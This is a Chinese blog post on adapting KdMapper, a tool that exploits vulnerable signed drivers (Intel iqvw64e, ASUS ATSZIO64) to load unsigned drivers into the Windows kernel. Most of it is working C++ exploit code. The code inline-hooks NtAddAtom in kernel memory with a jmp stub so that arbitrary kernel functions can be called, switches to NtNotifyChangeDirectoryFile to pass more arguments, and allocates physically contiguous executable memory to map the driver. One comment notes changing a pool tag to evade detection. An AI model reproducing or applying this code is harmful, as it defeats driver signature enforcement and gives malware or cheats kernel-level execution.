首页 > 其他分享 >KdMapper扩展中遇到的相关问题

KdMapper扩展中遇到的相关问题

时间:2023-09-03 17:00:27浏览次数:48  
标签:uint64 kernel handle 遇到 扩展 NtAddAtom KdMapper 参数 device

1.背景

  KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动,本人在利用其它漏洞(参考《【转载】利用签名驱动漏洞加载未签名驱动》)做相应的修改以实现类似功能。在这其中遇到了两个重要的问题,记录下来以作参考。

 

2.CallKernelFunction问题及修改 

 

2.1 相关核心代码

template<typename T, typename ...A>
	bool CallKernelFunction(HANDLE device_handle, T* out_result, uint64_t kernel_function_address, const A ...arguments) 
{
     ......   
    
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    ......
    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    ......
    uint8_t kernel_injected_jmp[] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 };
    uint8_t original_kernel_function[sizeof(kernel_injected_jmp)];
    *(uint64_t*)&kernel_injected_jmp[2] = kernel_function_address;

    static uint64_t kernel_NtAddAtom = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "NtAddAtom");
    ......
    if (!ReadMemory(device_handle, kernel_NtAddAtom, &original_kernel_function, sizeof(kernel_injected_jmp)))
        return false;
    ......
    if (!WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, &kernel_injected_jmp, sizeof(kernel_injected_jmp)))
        return false;
    
    if constexpr (!call_void)
    {
        using FunctionFn = T(__stdcall*)(A...);
        const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);
        *out_result = Function(arguments...);
    }
    else 
    {
        using FunctionFn = void(__stdcall*)(A...);
        const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);
        Function(arguments...);
    }
    // Restore the pointer/jmp
    WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, original_kernel_function, sizeof(kernel_injected_jmp));
    return true;
}

   其原理就是InlineHook系统调用函数NtAddAtom,在NtAddAtom头部跳转至指定的函数,然后在用户层的ntdll中调用相应的系统调用NtAddAtom,之后就可以跳转至内核。

 

2.2 调试查看

  如图:

  使用命令 ba e1 nt!NtAddAtom在函数下执行断点,然后运行KdMapper,断下后可以发现NtAddAtom的执行代码亦变成跳转到 ExAcquireResourceExclusiveLite,这是代码中执行相关函数的实现。

 

2.3 其它相关执行函数

  通过搜索可以看到CallKernelFunction的相关执行函数有几个,如下:

  其中除了MmMapLockedPagesSpecifyCache以外,其它的函数参数个数都在四个及以下,MmMapLockedPagesSpecifyCache的执行成功可能是个巧合(后边会做相应的分析)。

 

2.4 执行函数的逻辑

  在2.1中可以看到内核中inline Hook了NtAddAtom,然后在用户层调用ntdll的NtAddAtom,然后就从用户层进入到内核。但在这个过程中的SSDT调用,系统将用户态的参数复制到内核中是根据SSPT指定的参数个数来复制的,每个系统的调用数据个数获取可以参考文章《WinDbg打印SSDT的参数个数脚本》,可以得出NtAddAtom的参数小于4个。使用IDA查看Win10 x64的NtAddAtom函数如下图,显示参数为3个。

  至于为什么以4个参数为参考,是因为在x64环境下,函数传参数的前四个是用寄存器 rcx,rdx,r8,r9,多于四个才用内存栈。这样来说使用NtAddAtom作跳转只能传递四个参数,多的参数从用户空间到内核空间不会进行复制。

 

2.5 实际在扩展中的遇到的问题

  在扩展其它漏洞利用时使用了MmAllocatePagesForMdlEx函数,该函数原型如下:

PMDL MmAllocatePagesForMdlEx(
  [in] PHYSICAL_ADDRESS    LowAddress,
  [in] PHYSICAL_ADDRESS    HighAddress,
  [in] PHYSICAL_ADDRESS    SkipBytes,
  [in] SIZE_T              TotalBytes,
  [in] MEMORY_CACHING_TYPE CacheType,
  [in] ULONG               Flags
);

  一共有六个参数,当时直接使用了后边两个参数传递的数据始终不正确,经过调试及分析才发现后两个参数并没有从用户空间传到内核空间。MmMapLockedPagesSpecifyCache的成功真的只是巧合,可能该函数最后两个参数不影响函数的成功。

 

2.6 关于如何修改

  更改的话只需要将NtAddAtom函数替换成一个参数比较多的native API,且在ntdll.dll中有相关调用的。根据《WinDbg打印SSDT的参数个数脚本》 ,用Windbg调试加IDA分析 ntdll.dll,确定可以使用NtNotifyChangeDirectoryFile,它在Win10下有9个参数。

 

 

2.7 修改后代码

template<typename T, typename ...A>
	bool CallKernelFunction(HANDLE device_handle, T* out_result, uint64_t kernel_function_address, const A ...arguments) 
{
     ......   
    
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    ......
    //NtAddAtom参数个数过少,使得用R3到R0时复制的数据少,四个之内使用rcx,rdx,r8和r9,多于四个使用内存栈,因此在使用NtAddAtom作为跳转函数时
    //MmAllocatePagesForMdlEx(6个参数)和MmMapLockedPagesSpecifyCache(6个参数)	会导致后边的参数在进入内核时并未复制,因此而调用失败
    //而NtNotifyChangeDirectoryFileEx有10个参数
    //Win10 有NtNotifyChangeDirectoryFileEx而Win7没有,但Win7有NtNotifyChangeDirectoryFile(9个参数)
    //const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtNotifyChangeDirectoryFile"));
    ......

    static uint64_t kernel_NtAddAtom = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "NtNotifyChangeDirectoryFile");
    ......

    return true;
}

 

3.MapDriver分配

 

3.1 相关原始代码

uint64_t kdmapper::MapDriver(HANDLE iqvw64e_device_handle, 
                             BYTE* data, 
                             ULONG64 param1,
                             ULONG64 param2,
                             bool free, 
                             bool destroyHeader,
                             bool mdlMode, 
                             bool PassAllocationAddressAsFirstParam,
                             mapCallback callback, 
                             NTSTATUS* exitCode) 
{
    ......
    if (mdlMode) {
		kernel_image_base = AllocMdlMemory(iqvw64e_device_handle, image_size, &mdlptr);
	}
	else {
		kernel_image_base = intel_driver::AllocatePool(iqvw64e_device_handle, nt::POOL_TYPE::NonPagedPool, image_size);
	}
    ......
    if (!intel_driver::WriteMemory(iqvw64e_device_handle, realBase, (PVOID)((uintptr_t)local_image_base + (destroyHeader ? TotalVirtualHeaderSize : 0)), image_size))
    {
		Log(L"[-] Failed to write local image to remote image" << std::endl);
		kernel_image_base = realBase;
		break;
	}
    ......
    if (!asus_driver::CallKernelFunction(asus_device_handle, &status, address_of_entry_point, (PassAllocationAddressAsFirstParam ? realBase : param1), param2)) {
        Log(L"[-] Failed to call driver entry" << std::endl);
        kernel_image_base = realBase;
        break;
    }
    ......
}

uint64_t kdmapper::AllocMdlMemory(HANDLE iqvw64e_device_handle, uint64_t size, uint64_t* mdlPtr) {
	/*added by psec*/
	LARGE_INTEGER LowAddress, HighAddress;
	LowAddress.QuadPart = 0;
	HighAddress.QuadPart = 0xffff'ffff'ffff'ffffULL;

	uint64_t pages = (size / PAGE_SIZE) + 1;
	auto mdl = intel_driver::MmAllocatePagesForMdl(iqvw64e_device_handle, LowAddress, HighAddress, LowAddress, pages * (uint64_t)PAGE_SIZE);
	if (!mdl) {
		Log(L"[-] Can't allocate pages for mdl" << std::endl);
		return { 0 };
	}

	uint32_t byteCount = 0;
	if (!intel_driver::ReadMemory(iqvw64e_device_handle, mdl + 0x028 /*_MDL : byteCount*/, &byteCount, sizeof(uint32_t))) {
		Log(L"[-] Can't read the _MDL : byteCount" << std::endl);
		return { 0 };
	}

	if (byteCount < size) {
		Log(L"[-] Couldn't allocate enough memory, cleaning up" << std::endl);
		intel_driver::MmFreePagesFromMdl(iqvw64e_device_handle, mdl);
		intel_driver::FreePool(iqvw64e_device_handle, mdl);
		return { 0 };
	}

	auto mappingStartAddress = intel_driver::MmMapLockedPagesSpecifyCache(iqvw64e_device_handle, mdl, nt::KernelMode, nt::MmCached, NULL, FALSE, nt::NormalPagePriority);
	if (!mappingStartAddress) {
		Log(L"[-] Can't set mdl pages cache, cleaning up." << std::endl);
		intel_driver::MmFreePagesFromMdl(iqvw64e_device_handle, mdl);
		intel_driver::FreePool(iqvw64e_device_handle, mdl);
		return { 0 };
	}

	const auto result = intel_driver::MmProtectMdlSystemAddress(iqvw64e_device_handle, mdl, PAGE_EXECUTE_READWRITE);
	if (!result) {
		Log(L"[-] Can't change protection for mdl pages, cleaning up" << std::endl);
		intel_driver::MmUnmapLockedPages(iqvw64e_device_handle, mappingStartAddress, mdl);
		intel_driver::MmFreePagesFromMdl(iqvw64e_device_handle, mdl);
		intel_driver::FreePool(iqvw64e_device_handle, mdl);
		return { 0 };
	}
	Log(L"[+] Allocated pages for mdl" << std::endl);

	if (mdlPtr)
		*mdlPtr = mdl;

	return mappingStartAddress;
}

uint64_t intel_driver::AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_type, uint64_t size) {
	if (!size)
		return 0;

	static uint64_t kernel_ExAllocatePool = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExAllocatePoolWithTag");

	if (!kernel_ExAllocatePool) {
		Log(L"[!] Failed to find ExAllocatePool" << std::endl);
		return 0;
	}

	uint64_t allocated_pool = 0;

	if (!CallKernelFunction(device_handle, &allocated_pool, kernel_ExAllocatePool, pool_type, size, 'BwtE')) //Changed pool tag since an extremely meme checking diff between allocation size and average for detection....
		return 0;

	return allocated_pool;
}

  可以看到加载指定的驱动文件时根据是否是mdl加载来分配内存,调用的是AllocatePool或者AllocMdlMemory,而这两个函数分配的都是内存虚拟地址是连续的,但物理内存是不连续的,在有些情况下会导致问题。

 

3.2 使用物理内存读写时导致的问题

  3.1中指中原始的代码分配内存方式,在原kdmapper中未出现问题是因为Intel的漏洞利用是直接读写虚拟地址,例如复制内存代码如下:

bool intel_driver::MemCopy(HANDLE device_handle, uint64_t destination, uint64_t source, uint64_t size) {
	if (!destination || !source || !size)
		return 0;

	COPY_MEMORY_BUFFER_INFO copy_memory_buffer = { 0 };

	copy_memory_buffer.case_number = 0x33;
	copy_memory_buffer.source = source;
	copy_memory_buffer.destination = destination;
	copy_memory_buffer.length = size;

	DWORD bytes_returned = 0;
	return DeviceIoControl(device_handle, ioctl1, &copy_memory_buffer, sizeof(copy_memory_buffer), nullptr, 0, &bytes_returned, nullptr);
}

  因此不会出现问题,是因为直接操作内存。但在其它漏洞利用时,有时是利用物理内存,例如(参考《【转载】利用签名驱动漏洞加载未签名驱动》)ATSZIO64.sys中IDA反汇编的代码:

// MapPhysicalMemory
NTSTATUS __fastcall sub_140005B0C(union _LARGE_INTEGER Offset, unsigned int nSize, PVOID *pAddressMapped, void **hSection)
{
  ULONG_PTR nSizeMapped; // rbx
  NTSTATUS result; // eax
  SIZE_T v9; // r15
  NTSTATUS ntStatus; // eax
  void *hSectionMapped; // rcx
  NTSTATUS ntStatusReturn; // ebx
  NTSTATUS ntStatusMap; // ebx
  union _LARGE_INTEGER SectionOffset; // [rsp+58h] [rbp-39h] BYREF
  ULONG_PTR ViewSize; // [rsp+60h] [rbp-31h] BYREF
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [rsp+68h] [rbp-29h] BYREF
  struct _UNICODE_STRING DestinationString; // [rsp+98h] [rbp+7h] BYREF
  PVOID Object; // [rsp+A8h] [rbp+17h] BYREF
  PVOID BaseAddress; // [rsp+F8h] [rbp+67h] BYREF

  nSizeMapped = nSize;
  RtlInitUnicodeString(&DestinationString, L"\\Device\\PhysicalMemory");
  ObjectAttributes.RootDirectory = 0i64;
  ObjectAttributes.SecurityDescriptor = 0i64;
  ObjectAttributes.SecurityQualityOfService = 0i64;
  ObjectAttributes.ObjectName = &DestinationString;
  ObjectAttributes.Length = 48;
  ObjectAttributes.Attributes = 512;
  result = ZwOpenSection(hSection, 7u, &ObjectAttributes);
  BaseAddress = 0i64;
  v9 = (unsigned int)nSizeMapped;
  ViewSize = nSizeMapped;
  SectionOffset = Offset;
  if ( result >= 0 )
  {
    ntStatus = ObReferenceObjectByHandle(*hSection, 7u, 0i64, 0, &Object, 0i64);
    hSectionMapped = *hSection;
    ntStatusReturn = ntStatus;
    if ( ntStatus >= 0 )
    {
      ntStatusMap = ZwMapViewOfSection(
                      hSectionMapped,
                      (HANDLE)0xFFFFFFFFFFFFFFFFi64,
                      &BaseAddress,
                      0i64,
                      v9,
                      &SectionOffset,
                      &ViewSize,
                      ViewShare,
                      0,
                      4u);
      ZwClose(*hSection);
      result = ntStatusMap;
      *pAddressMapped = BaseAddress;
      return result;
    }
    ZwClose(hSectionMapped);
    result = ntStatusReturn;
  }
  *pAddressMapped = 0i64;
  return result;
}

  先把物理内存映射至用户空间,然后对内存进行操作,而这种情况下,读写内存就会出现问题,当操作内存大小大于一个页面时,就不能保证物理地址上的连续在对应的虚拟地址上也是连续的,如下图:

  上图中展示连续的虚拟页面对应的物理页面不连续,同样,连续的物理页面对应的虚拟页面也不一定边结。

  这样就导致一个问题,MapDriver在将驱动文件写入内存中WriteMemory时,使用的物理内存映射的地址,虽是连续的,但实际的虚拟页面可能就只写了第一个,其它的页面没有真正写入数据,这样在调用驱动文件入口函数CallKernelFunction时就会出现,导致BSOD。

 

3.3解决方案

  使用分配物理页面上连续的分配内存函数MmAllocatePagesForMdlEx和MmAllocateContiguousMemory。使用这些函数后,物理页面是连续的,映射后的虚拟页面也是连续的,同时和物理页面一一对应,这样就不会在写入读取数据时出现问题了。

 

3.4 实现代码

uint64_t asus_driver::MmAllocateContiguousMemory(HANDLE device_handle, SIZE_T NumberOfBytes)
{
        if (!NumberOfBytes)
                return 0;

        static uint64_t kernel_MmAllocateContiguousMemory = GetKernelModuleExport(device_handle, asus_driver::ntoskrnlAddr, "MmAllocateContiguousMemory");

        if (!kernel_MmAllocateContiguousMemory) {
                Log(L"[!] Failed to find MmAllocateContiguousMemory" << std::endl);
                return 0;
        }

        uint64_t pAddress = 0;

        if (!CallKernelFunction(device_handle, &pAddress, kernel_MmAllocateContiguousMemory, NumberOfBytes, MAXULONG64)) //Changed pool tag since an extremely meme checking diff between allocation size and average for detection....
                return 0;

        return pAddress;
}

uint64_t asus_driver::MmAllocatePagesForMdlEx(HANDLE device_handle, LARGE_INTEGER LowAddress, LARGE_INTEGER HighAddress, LARGE_INTEGER SkipBytes, SIZE_T TotalBytes, nt::MEMORY_CACHING_TYPE CacheType, nt::MEMORY_ALLOCATE_FLAG Flags)
{
        static uint64_t kernel_MmAllocatePagesForMdlEx = GetKernelModuleExport(device_handle, asus_driver::ntoskrnlAddr, "MmAllocatePagesForMdlEx");
        if (!kernel_MmAllocatePagesForMdlEx)
        {
                Log(L"[!] Failed to find MmAllocatePagesForMdlEx" << std::endl);
                return 0;
        }

        uint64_t allocated_pages = 0;

        if (!CallKernelFunction(device_handle, &allocated_pages, kernel_MmAllocatePagesForMdlEx, LowAddress, HighAddress, SkipBytes, TotalBytes, CacheType, Flags))
        {
                Log(L"[!] Failed to CallKernelFunction MmAllocatePagesForMdlEx" << std::endl);
                return 0;
        }

        return allocated_pages;
}

uint64_t kdmapper::AllocContiguousMdlMemory(HANDLE asus_device_handle, uint64_t size, uint64_t* mdlPtr) {
        /*added by psec*/
        LARGE_INTEGER LowAddress, HighAddress, SkipAddress;
        LowAddress.QuadPart = 0;
        HighAddress.QuadPart = 0xffff'ffff'ffff'ffffULL;
        SkipAddress.QuadPart = 0;
        uint64_t pages = (size / PAGE_SIZE) + 1;
        auto mdl = asus_driver::MmAllocatePagesForMdlEx(
                asus_device_handle,
                LowAddress,
                HighAddress,
                SkipAddress,
                pages * (uint64_t)PAGE_SIZE,
                nt::MEMORY_CACHING_TYPE::MmNonCached,
                nt::MEMORY_ALLOCATE_FLAG::MM_ALLOCATE_REQUIRE_CONTIGUOUS_CHUNKS);
        if (!mdl) {
                Log(L"[-] Can't allocate pages for mdl" << std::endl);
                return { 0 };
        }

        uint32_t byteCount = 0;
        if (!asus_driver::ReadMemory(asus_device_handle, mdl + 0x028 /*_MDL : byteCount*/, &byteCount, sizeof(uint32_t))) {
                Log(L"[-] Can't read the _MDL : byteCount" << std::endl);
                return { 0 };
        }

        if (byteCount < size) {
                Log(L"[-] Couldn't allocate enough memory, cleaning up" << std::endl);
                asus_driver::MmFreePagesFromMdl(asus_device_handle, mdl);
                asus_driver::FreePool(asus_device_handle, mdl);
                return { 0 };
        }

        auto mappingStartAddress = asus_driver::MmMapLockedPagesSpecifyCache(asus_device_handle, mdl, nt::KernelMode, nt::MmCached, NULL, FALSE, nt::NormalPagePriority);
        if (!mappingStartAddress) {
                Log(L"[-] Can't set mdl pages cache, cleaning up." << std::endl);
                asus_driver::MmFreePagesFromMdl(asus_device_handle, mdl);
                asus_driver::FreePool(asus_device_handle, mdl);
                return { 0 };
        }

        const auto result = asus_driver::MmProtectMdlSystemAddress(asus_device_handle, mdl, PAGE_EXECUTE_READWRITE);
        if (!result) {
                Log(L"[-] Can't change protection for mdl pages, cleaning up" << std::endl);
                asus_driver::MmUnmapLockedPages(asus_device_handle, mappingStartAddress, mdl);
                asus_driver::MmFreePagesFromMdl(asus_device_handle, mdl);
                asus_driver::FreePool(asus_device_handle, mdl);
                return { 0 };
        }
        Log(L"[+] Allocated pages for mdl" << std::endl);

        if (mdlPtr)
                *mdlPtr = mdl;

        return mappingStartAddress;
}

uint64_t kdmapper::MapDriver(HANDLE iqvw64e_device_handle, 
                             BYTE* data, 
                             ULONG64 param1,
                             ULONG64 param2,
                             bool free, 
                             bool destroyHeader,
                             bool mdlMode, 
                             bool PassAllocationAddressAsFirstParam,
                             mapCallback callback, 
                             NTSTATUS* exitCode) 
{
    ......
    if (mdlMode) {
        //kernel_image_base = AllocMdlMemory(asus_device_handle, image_size, &mdlptr);
        kernel_image_base = AllocContiguousMdlMemory(asus_device_handle, image_size, &mdlptr);
    }
	else {
        //kernel_image_base = asus_driver::AllocatePool(asus_device_handle, nt::POOL_TYPE::NonPagedPool, image_size);
        kernel_image_base = asus_driver::MmAllocateContiguousMemory(asus_device_handle, image_size);    
    }
    ......
}

 

标签:uint64,kernel,handle,遇到,扩展,NtAddAtom,KdMapper,参数,device
From: https://www.cnblogs.com/ImprisonedSoul/p/17674671.html

相关文章

  • 向量搜索技术:基于Elasticsearch/PostgreSQL/Redis扩展的向量搜索数据库或独立向量搜索
    理论基础与研究向量数据库用于非结构化文本、图片、音频、视频搜索、推荐,将他们转换为数字向量表示来进行相似性(ANN)搜索。存储和搜索高维向量是其特征之一,通常采用高级索引技术和算法如HNSW,Annoy,或Faiss来实现。不同于SQL数据库,向量数据库更像nosql,用户接受使用sdk/API......
  • EasyPlayer开放外部录像接口:自由扩展H.265网页播放功能
    EasyPlayer通过实现视频实时录像功能,不仅提供轻量化、便捷化的视频资源下载能力,同时有效减少了带宽和计算资源的消耗。这种创新的功能使得用户可以灵活地获取所需的视频数据,为其节省使用成本并提升整体效率。今天我们来分享一下EasyPlayer播放器对外开放录像的方法。1)在播放器内部......
  • OpenCV配置遇到的问题
    由于找不到opencv_world410d.dll,无法执行代码,重新安装程序可能会解决此问题将opencv安装路径目录\opencv\build\x64\vc15\bin中3个后缀是.dll的应用程序扩展复制到C:\Windows\System32中(可能还需要拷贝到SysWOW64中) 成功解决由于找不到opencv_world410d.dll,无法执......
  • 如果您在集成H.265视频流媒体播放器EasyPlayer.js时遇到了"SourceBuffer"报错,您可以采
    EasyPlayer是由青犀视频公司推出的一款功能强大且高度开放的H.265视频流媒体播放器。它支持播放H.264和H.265视频格式,具有出色的稳定性和流畅的播放效果。此外,EasyPlayer还提供多个版本供用户选择,包括EasyPlayer-RTSP、EasyPlayer-Pro和EasyPlayer.js等版本。每个版本都具有自己的......
  • 如何在CMAKE中指定python路径——使用cmake为python编译扩展模块时指定python路径
     答案:cmake-DPython3_EXECUTABLE=/path/to/bin/python3   =================================================    参考:https://stackoverflow.com/questions/49908989/cmake-cant-find-python3   =================================== ......
  • mac中php安装sqlsrv扩展
     安装php扩展sudopeclinstallsqlsrv-5.10.0sudopeclinstallpdo_sqlsrv-5.10.0 M系列芯片sudoCXXFLAGS="-I/opt/homebrew/opt/unixodbc/include/"LDFLAGS="-L/opt/homebrew/lib/"peclinstallsqlsrv-5.10.0sudoCXXFLAGS="-I/opt/homebre......
  • 3.2.3 单元格扩展
    一、单元格扩展掌握单元格扩展的概念;学会制作行式报表和交叉报表1.应用场景数据集中的字段拖入到单元格后,如果不进行单元格扩展,字段下的数据会在一个单元格中集中展示。如下图:通过设置单元格扩展功能,可以让一个字段下的不同数据在多个单元格中展示。2.功能介绍......
  • Redis高可用集群之水平扩展(3.2)
    Redis3.0以后的版本虽然有了集群功能,提供了比之前版本的哨兵模式更高的性能与可用性,但是集群的水平扩展却比较麻烦,今天就来带大家看看redis高可用集群如何做水平扩展,原始集群(见下图)由6个节点组成,6个节点分布在三台机器上,采用三主三从的模式1、启动集群#启动整个集群/usr......
  • DBeaver 使用中遇到驱动的问题并解决方案--mysql
    一、DBeaver的下载二、DBeaver的安装1、双击下载的EXE安装包,按提示选择目录进行安装即可三、DBeaver的配置1、第一次启动时会有一个弹窗,意思是添加一个连接数据库的模板,可以选择否2、点击窗口-首选项-连接-驱动-Maven,点击添加,增加仓库源地址(阿里云:https://maven.aliyun.com/......
  • 数据手套控制无人机遇到的问题
    ......